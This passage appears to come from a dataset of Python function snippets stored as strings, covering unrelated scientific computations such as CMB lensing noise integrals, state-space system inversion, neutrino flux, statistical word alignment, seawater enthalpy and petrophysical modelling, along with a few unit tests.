-phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TB.__func__, \"integ\"):\n self.N_TT_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_get_nveto_pmt_item(self):\n pass", "def stbinv(A, B, C, D, y, t):\n # Description to help the user\n\n # calculate the number of samples of the output\n N = np.shape(y)[\n 1\n ] # the number of samples is the number of columns of the data matrix y\n\n # calculate system's dimensions: number of states and number of inputs\n m = B.shape[1] # number of inputs\n n = A.shape[0] # number of states\n\n # initialize the variable v (additional input)\n v = np.zeros((n, N)) # it will be important later\n\n # initializing the flag variable\n flag = 0\n # initializing the flag variable for the vrft method\n flag_vr = 0\n # initializing the counter of reduction steps done by the algorithm\n kround = 0\n\n # starting the loop of the reduction procedure\n while flag == 0:\n # run a step of the reduction order algorithm\n Ahat, Bhat, Chat, Dhat, yhat, vhat, nhat, phat, rhat = invredc(A, B, C, D, y, v)\n # increase the counter of reductions\n kround = kround + 1\n\n # preallocating the state vector of the inverse system\n xhat = np.zeros((nhat, N - kround)) # it must have N-kround samples\n # preallocating the calculated input\n uhat = np.zeros((m, N - kround))\n\n # defining the reduced time vector\n tt = t[:, 0 : N - kround]\n\n # test the conditions of invertibility\n if phat < m:\n # if this condition is true, then the algorithm has failed and it is not possible to find the inverse\n flag = 1\n flag_vr = 1\n # if this is the case, we print a message and end the execution\n # print('The inversion algorithm has failed')\n return uhat, tt, flag_vr\n else:\n if rhat == m:\n # ((rhat==m)&(rhat==phat)):\n # if this condition is true, then the algorithm is done. We can calculate the signal u\n flag = 2\n # calculating the inverse of the feedforward matrix\n # E=np.linalg.inv(Dhat)\n E = np.linalg.pinv(Dhat)\n else:\n # if none of the conditions above is true, then we need to proceed to another round of the reduction step of the algorithm\n A = Ahat\n B = Bhat\n C = Chat\n D = Dhat\n y = yhat\n v = vhat\n # after the reduction procedure is done, then the system can be inverted\n\n # calculating the dynamic matrix of the inverse system\n Ainv = Ahat - Bhat @ E @ Chat\n # eigenvalues of the inverse system's dynamic matrix\n wv, v = np.linalg.eig(Ainv) # w=eigenvalues, v=eigenvectors\n # calculating the input matrix of the inverse system\n Binv = Bhat @ E\n # calculating the output matrix of the inverse system\n Cinv = -E @ Chat\n # calculating the feedforward matrix of the inverse system\n Dinv = E\n\n # test if the inverse dynamic system is stable\n wbool = wv > 1\n wsum = np.sum(wbool)\n # test if wsum is greater than 1\n if wsum > 0:\n # if wsum is greater than 1, then, the inverse system is unstable, so we end the execution of the algorithm\n # print('The inverse system is unstable')\n flag_vr = 2\n return uhat, tt, flag_vr\n else:\n # if wsum=0, then the inverse system is stable, and we can calculate the input signal\n # calculate the first value for the output (t=0)\n uhat[:, 0] = Cinv @ xhat[:, 0] + Dinv @ yhat[:, 0]\n # calculate the states and the output of the inverse system\n for k in range(0, N - 1 - kround):\n xhat[:, k + 1] = Ainv @ xhat[:, k] + Binv @ yhat[:, k] + vhat[:, k]\n uhat[:, k + 1] = Cinv @ xhat[:, k + 1] + Dinv @ yhat[:, k + 1]\n\n return uhat, tt, flag_vr", "def Phi_nu_mu1(self, E_nu, N=1e24):\n #check this \n try:\n phi = [0.]*len(E_nu)\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n for i, E_nu in enumerate(E_nu):\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n\n for j in range(Intervals):\n phi[i] += 1.6*N*quad(Int, IntegrationBoundary[j], IntegrationBoundary[j+1])[0]\n\n return np.array(phi)\n\n except TypeError as e:\n phi = 0.\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n for i in range(Intervals):\n phi += 1.6*N*quad(Int, IntegrationBoundary[i], IntegrationBoundary[i+1])[0]\n print (phi)\n\n return phi", "def test_active_inference_SPM_1b(self):", "def test_compute_inventory():\n T = [1000]\n c_max = [1e20]\n time = 1e3\n inv, sig = divHretention.compute_inventory(T, c_max, time)\n assert len(inv) == len(sig)\n assert len(inv) == len(T)", "def em_step(t, eng, fre):\n # TODO\n # Lecture Steps:\n # 1. Make a table of P(f|e) for all possible pairs of f and e, prob_tab\n # 2. Make a grid where each sentence pair is a row and each possible\n # alignment is a column\n # 3. For each sentence pair and alignment compute P(F|a,E)\n # Given aligned words f1,f2,...,fn and e1,e2,...,en in the pair:\n # P(F|a,E) = prob_tab[f1][e1] * ... * prob_tab[fn][en]\n # 4. For each sentence pair and alignment\n # divide P(F|a,E) by the sum of the P(F|a,E)'s in the row\n # this is P(a|E,F)\n # 5. For each possible word pair e and f, sum P(a|E,F) across all\n # alignments and sentence pairs for each instance that e is aligned\n # with f, this gets out a TCount table\n # 6. Sum over the rows of TCount to get the total estimates for each\n # english word e.\n # 7. Compute P(f|e) = TCount[f][e] / Total[e]\n # This is the model after 1 iteration.\n\n '''\n Tutorial Steps:\n initialize P(f|e)\n for a number of iterations:\n set tcount(f, e) to 0 for all f, e\n set total(e) to 0 for all e\n for each sentence pair (F, E) in training corpus:\n for each unique word f in F:\n denom_c = 0\n for each unique word e in E:\n denom_c += P(f|e) * F.count(f)\n for each unique word e in E:\n tcount(f, e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n total(e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n for each e in domain(total(:)):\n for each f in domain(tcount(:,e)):\n P(f|e) = tcount(f, e) / total(e)\n '''\n\n '''\n My Pseudocode:\n The Table of P(f|e) is already initiated as the AM dictionary.\n Presumably the AM is passed in as t.\n Initialize TCount as a dictionary like AM, e.g. TCount[e][f] = 0\n Initialize Total as a dictionary with the same entries as TCount[e] = 0\n for i in range(0,len(eng)):\n\n '''\n AM = dict.fromkeys(t.keys(), 0)\n Total = dict.fromkeys(t.keys(), 0)\n TCount = dict.fromkeys(t.keys(), 0)\n for key in TCount.keys():\n TCount[key] = dict.fromkeys(t[key].keys(), 0)\n AM[key] = dict.fromkeys(t[key].keys(), 0)\n\n num_sentences = min(len(eng), len(fre))\n for i in range(0, num_sentences):\n E = eng[i]\n F = fre[i]\n E_uniques = list(set(E))\n F_uniques = list(set(F))\n for f in F_uniques:\n denom_c = 0\n for e in E_uniques:\n denom_c += t[e][f] * F.count(f)\n for e in E_uniques:\n TCount[e][f] += t[e][f] * F.count(f) * E.count(e) / denom_c\n Total[e] += t[e][f] * F.count(f) * E.count(e) / denom_c\n for e in Total.keys():\n for f in TCount[e].keys():\n AM[e][f] = TCount[e][f] / Total[e]\n\n return AM", "def test_nr_trinuc(self):\n preds = [\n MotifChange(\"A\", \"C\"),\n MotifChange(\"G\", \"A\"),\n MotifChange(\"CGA\", \"TGA\"),\n ]\n sm = substitution_model.TimeReversibleTrinucleotide(predicates=preds)\n got = sm.get_param_list()\n self.assertEqual(got, [\"A/C\", \"G/A\", \"CGA/TGA\"])\n self.assertEqual(len(sm.get_motifs()), 64)", "def N_TE_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EB.__func__, \"integ\"):\n self.N_TE_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TE_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EE.__func__, \"integ\"):\n self.N_TE_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_generate_nb(self):\n pass", "def MPinv(list_of_ch,direction, angle, azimuth):\n\n\n \"\"\"~~~~~~~~~~~ Input conditions ~~~~~~~~~~~~~~\"\"\"\n ch_list = list_of_ch\n direction_deg = float(direction) #inclined direction of wellbore from North\n angle_deg = float(angle) # inclined angle of well \n azimuth_deg = float(azimuth) # core orientation from North or inclined direction \n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n azimuth_deg = azimuth_deg - 45\n\n \"\"\"~~~~~~~~~~~ Allocate numbers to each direction (for example, xx => 0, xy => 3 etc...) ~~~~~~~~~~~~~~\"\"\"\n ch_col = ch_list.columns.values\n\n if \"xx\" in ch_col: ch_list.at[\"ch_no\",\"xx\"] =0\n if \"yy\" in ch_col: ch_list.at[\"ch_no\",\"yy\"] =1\n if \"zz\" in ch_col: ch_list.at[\"ch_no\",\"zz\"] =2\n if \"xy\" in ch_col: ch_list.at[\"ch_no\",\"xy\"] =3\n if \"yx\" in ch_col: ch_list.at[\"ch_no\",\"yx\"] =4\n if \"yz\" in ch_col: ch_list.at[\"ch_no\",\"yz\"] =5\n if \"zy\" in ch_col: ch_list.at[\"ch_no\",\"zy\"] =6\n if \"zx\" in ch_col: ch_list.at[\"ch_no\",\"zx\"] =7\n if \"xz\" in ch_col: ch_list.at[\"ch_no\",\"xz\"] =8\n\n ch = ch_list.loc[\"ch_no\",:].values\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n Number_of_vector = len(ch)\n No_v = Number_of_vector\n direction_rad = direction_deg*pi*180**(-1) \n angle_rad = angle_deg*pi*180**(-1) \n azimuth_rad = azimuth_deg*pi*180**(-1) \n\n\n \"\"\"~~~~~~~~ Create matrix of Direction Cosine vectors~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n c=np.cos(0.25*pi)\n s=np.sin(0.25*pi)\n n = np.zeros((3,9))\n\n n[:,0] = np.array([1,0,0])\n n[:,1] = np.array([0,1,0])\n n[:,2] = np.array([0,0,1])\n n[:,3] = np.array([c,s,0])\n n[:,4] = np.array([c,-s,0])\n n[:,5] = np.array([0,c,s])\n n[:,6] = np.array([0,c,-s])\n n[:,7] = np.array([c,0,s])\n n[:,8] = np.array([-c,0,s])\n\n\n \"\"\"~~~~~~~~~~~~~~ coordinate transformation from 'ASR local co-ordinate' to 'Geological co-ordinate' ~~~~~~~~~~~~~~~~~\"\"\"\n cdr = np.cos(direction_rad)\n sdr = np.sin(direction_rad)\n\n caz = np.cos(azimuth_rad)\n saz = np.sin(azimuth_rad)\n\n can = np.cos(angle_rad)\n san = np.sin(angle_rad)\n\n Rdr = np.array([[cdr, sdr, 0],[-sdr, cdr, 0],[0, 0, 1]]) #counter_clockwise\n Ran = np.array([[1, 0, 0],[0, can, san],[0, -san, can]])\n Raz = np.array([[caz, -saz, 0],[saz, caz, 0],[0, 0, 1]])\n\n R1 = Ran.dot(Rdr)\n R2 = Raz.dot(R1)\n\n for i in range(0,9):\n n[:,i] = R2.dot(n[:,i])\n n= np.round(n,6)\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n\n\n\n \"\"\"~~~~~~~~ Create matrix A (b = Ax: b;Observed normal strain data, x;strain tensor component which we have to determine) ~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n X = np.empty((No_v,6))\n\n for i in range(0,No_v):\n cc = ch[i]\n X[i,:] = np.array([n[0,cc]**2, n[1,cc]**2, n[2,cc]**2, 2*n[0,cc]*n[1,cc], 2*n[1,cc]*n[2,cc], 2*n[2,cc]*n[0,cc]])\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n X_inv = np.linalg.pinv(X) # Calculate Moore-Penrose inverse matrix\n\n return X_inv", "def TR_algo7(self, p):\n h = 0\n ve = 0\n vd = self._vd\n m = max(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & ((~mu) & 2**self._N-1)\n l = [bit_component(px, i) for px in p]\n # 2. construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n l = T(ve, vd, l)\n w = inverse_gc(l)\n r = gcr(w, mu, pi)\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % self._N\n h = (h << mu_norm) | r\n return h", "def ec_matrix_vector(p0, T, n): \n if(n<=0):\n EC=np.zeros(T.shape)\n return EC\n else:\n \"\"\"Probability vector after (k=0) propagations\"\"\" \n p_k=1.0*p0\n \"\"\"Sum of vectors after (k=0) propagations\"\"\"\n p_sum=1.0*p_k \n for k in xrange(n-1):\n \"\"\"Propagate one step p_{k} -> p_{k+1}\"\"\"\n p_k=np.dot(p_k,T) \n \"\"\"Update sum\"\"\"\n p_sum+=p_k \n \"\"\"Expected counts\"\"\"\n EC=p_sum[:,np.newaxis]*T \n return EC", "def enthalpy_SSO_0_p(p):\r\n v01 = 9.998420897506056e+2\r\n v05 = -6.698001071123802\r\n v08 = -3.988822378968490e-2\r\n v12 = -2.233269627352527e-2\r\n v15 = -1.806789763745328e-4\r\n v17 = -3.087032500374211e-7\r\n v20 = 1.550932729220080e-10\r\n v21 = 1.0\r\n v26 = -7.521448093615448e-3\r\n v31 = -3.303308871386421e-5\r\n v36 = 5.419326551148740e-6\r\n v37 = -2.742185394906099e-5\r\n v41 = -1.105097577149576e-7\r\n v43 = -1.119011592875110e-10\r\n v47 = -1.200507748551599e-15\r\n SSO = 35.16504\r\n a0 = v21 + SSO * (v26 + v36 * SSO + v31 * np.sqrt(SSO))\r\n a1 = v37 + v41 * SSO\r\n a2 = v43\r\n a3 = v47\r\n b0 = v01 + SSO * (v05 + v08 * np.sqrt(SSO))\r\n b1 = 0.5 * (v12 + v15 * SSO)\r\n b2 = v17 + v20 * SSO\r\n b1sq = b1 ** 2\r\n sqrt_disc = np.sqrt(b1sq - b0 * b2)\r\n N = a0 + (2 * a3 * b0 * b1 / b2 - a2 * b0) / b2\r\n M = a1 + (4 * a3 * b1sq / b2 - a3 * b0 - 2 * a2 * b1) / b2\r\n A = b1 - sqrt_disc\r\n B = b1 + sqrt_disc\r\n part = (N * b2 - M * b1) / (b2 * (B - A))\r\n db2Pascal = 10000.0\r\n return (db2Pascal * (p * (a2 - 2 * a3 * b1 / b2 + 0.5 * a3 * p) / b2 +\r\n (M / (2 * b2)) * np.log(1 + p * (2 * b1 + b2 * p) / b0) + part *\r\n np.log(1 + (b2 * p * (B - A)) / (A * (B + b2 * p)))))", "def evaltr(x_solution): \n \n large = 10.0**30\n pred = np.zeros(cfg.ntrain)\n e0 = 0.0 # mean of observed values\n y=0.0\n for i in range(cfg.ntrain): # Computation of correct piece\n e0 += cfg.a_unscaled[i][-1]\n pind = 0\n ipbest = 0\n pbest = -large # for max\n \n for j1 in range(cfg.nomax):\n ipmin=pind\n pmin=large # for min\n for _ in range(cfg.jk[j1]):\n piece=x_solution[(pind+1)*cfg.nfea-1] \n for j3 in range(cfg.nfea-1): #\n piece += x_solution[pind*cfg.nfea+j3]*cfg.a_unscaled[i][j3]\n if piece < pmin:\n ipmin = pind\n pmin = piece\n pind += 1 \n \n if pmin > pbest:\n ipbest = ipmin\n pbest = pmin\n \n pred[i] = x_solution[(ipbest+1)*cfg.nfea-1] # Computation of prediction\n for j1 in range(cfg.nfea-1):\n pred[i] += x_solution[ipbest*cfg.nfea+j1]*cfg.a_unscaled[i][j1]\n y += pred[i]\n \n y = y/cfg.ntrain \n e0 = e0/cfg.ntrain\n \n # Computation of indices\n rmse = 0.0\n mae = 0.0\n e1 = 0.0\n for i in range(cfg.ntrain):\n rmse += (pred[i]-cfg.a_unscaled[i][-1])**2\n mae += np.abs(pred[i]-cfg.a_unscaled[i][-1]) \n e1 += (cfg.a_unscaled[i][-1] - e0)**2\n ce = 1.0 - rmse/e1 \n rmse = np.sqrt(rmse/cfg.ntrain)\n mae = mae/cfg.ntrain \n\n if cfg.ntrain > 1:\n sx=0.0\n sy=0.0\n rcor=0.0\n for i in range(cfg.ntrain):\n sx += (pred[i]-y)**2\n sy += (cfg.a_unscaled[i][-1]-e0)**2 \n rcor += (pred[i]-y) * (cfg.a_unscaled[i][-1]-e0) \n\n r = rcor/np.sqrt(sx*sy)\n \n return rmse,mae,ce,r", "def binary_dec(A,n_iter = 1000):\n\n\t### Initialization ###\n\n\tp, q = np.shape(A)\n\t### B : to be changed\n\tB = np.eye(p)\n \t###\n\tC = bin_random_mat(p,q)\n\tlist_dist = []\n\tB_argmin = B\n\tC_argmin = C\n\n\n\n\n\t## temperature ##\n\tT_n = np.log(np.arange(2,n_iter+2,1))\n\t#T_n = np.arange(2,n_iter+2,1)\n\tfor i in range(n_iter):\n\t## update ##\n\t\tC_0 = np.matrix(C)\n\t\tlist_dist =np.append( list_dist, V_potential(np.dot(B,C_0),A) )\n\t\tif V_potential(np.dot(B_argmin,C_argmin),A) == 0:\n\t\t\tbreak\n\t########## transition #############\n\t# Here we take 2 steps independent(for B and for C respectively)\n\t# We could also use metropolis hasting kernel.\n\n\t\tC_iter = np.matrix(Metropolis_transition_C(C))\n\t\n\n\t\tB_iter = B[np.random.permutation(np.arange(p))]\n\t\t\n\t\tif np.random.uniform(0,1,1) < \\\n\t\t\t\tnp.exp(-1./T_n[i]*( V_potential(np.dot(B_iter,C_iter), A)\\\n\t\t\t\t - V_potential(np.dot(B,C_0),A) ) ):\n\t\t\tC = C_iter\n\t\t\tB = B_iter\n\t######### end of transition ##############\n\n\t\t\tif V_potential(np.dot(B,C),A) < np.min(list_dist):\n\t\t\t\t\n\t\t\t\tB_argmin = B\n\t\t\t\tC_argmin = np.matrix(C)\n\t\t\t# print i+1\n\t\t\t# print V_potential(np.dot(B_argmin,C_argmin),A)\n\t\t\t# print C_argmin\n\t\t\t# print '\\n'\n\n\treturn list_dist,B_argmin, C_argmin", "def condition_tpm(self,tpm, fixed_nodes, state):\n conditioning_indices = [[slice(None)]] * len(state)\n for i in fixed_nodes:\n # Preserve singleton dimensions with `np.newaxis`\n conditioning_indices[i] = [state[i], np.newaxis]\n # Flatten the indices.\n conditioning_indices = list(chain.from_iterable(conditioning_indices))\n # Obtain the actual conditioned TPM by indexing with the conditioning\n # indices.\n return tpm[tuple(conditioning_indices)]", "def test_T2():\n infile = \"cisd/T2.in\"\n assert(os.path.exists(infile))\n with open(infile) as f:\n lines = f.readlines()\n assert(len(lines) == 10)\n\n hl1 = HirataLine(lines[0])\n assert(set(hl1.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl1.summation_indices == '')\n assert(hl1.prefactors == [\"+ 1.0 \"])\n assert(hl1.postfactors == ['v ( p3 p4 h1 h2 )'])\n assert(str(hl1) == lines[0].replace('\\n', ''))\n cl1 = Cc4sLine(hl1)\n assert(set(cl1.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl1.summation_indices == \"\")\n assert(cl1.prefactors == [\"+ 1.0 \"])\n assert(cl1.postfactors == ['Vabij[\"cdij\"]'])\n assert(cl1.to_cpp() == ['( + 1.0 ) * Vabij[\"cdij\"];'])\n\n hl8 = HirataLine(lines[7])\n assert(set(hl8.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl8.summation_indices == ' h6 p5 ')\n assert(\n hl8.prefactors == [\n '+ 1.0 ',\n '- 1.0 * P( p3 p4 h2 h1 => p4 p3 h2 h1 ) ',\n '- 1.0 * P( p3 p4 h2 h1 => p3 p4 h1 h2 ) ',\n '+ 1.0 * P( p3 p4 h2 h1 => p4 p3 h1 h2 ) '\n ]\n )\n assert(\n hl8.postfactors ==\n ['Sum ( h6 p5 )', 't ( p5 p3 h6 h2 )', 'v ( h6 p4 h1 p5 )']\n )\n assert(str(hl8) == lines[7].replace('\\n', ''))\n cl8 = Cc4sLine(hl8)\n assert(set(cl8.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl8.summation_indices == \" n e \")\n assert(\n cl8.prefactors ==\n ['+ 1.0 ',\n '- 1.0 * P( c d j i => d c j i ) ',\n '- 1.0 * P( c d j i => c d i j ) ',\n '+ 1.0 * P( c d j i => d c i j ) ']\n )\n assert(cl8.postfactors == ['Tabij[\"ecnj\"]', 'Viajb[\"ndie\"]'])\n assert(\n cl8.to_cpp() == [\n '( + 1.0 ) * Tabij[\"ecnj\"] * Viajb[\"ndie\"];',\n '( - 1.0 ) * Tabij[\"ednj\"] * Viajb[\"ncie\"];',\n '( - 1.0 ) * Tabij[\"ecni\"] * Viajb[\"ndje\"];',\n '( + 1.0 ) * Tabij[\"edni\"] * Viajb[\"ncje\"];'\n ]\n )", "def ORM2(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dk,Dpf],[HIc1,HIk,HIpf],[1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=0.000 # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[1] # Volume of organic component\n\t\tPHIe=XMatrix[2] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def nits(self):", "def __init__(self, prim):\n self.actual = prim", "def _inv_totient_estimate(m):\n 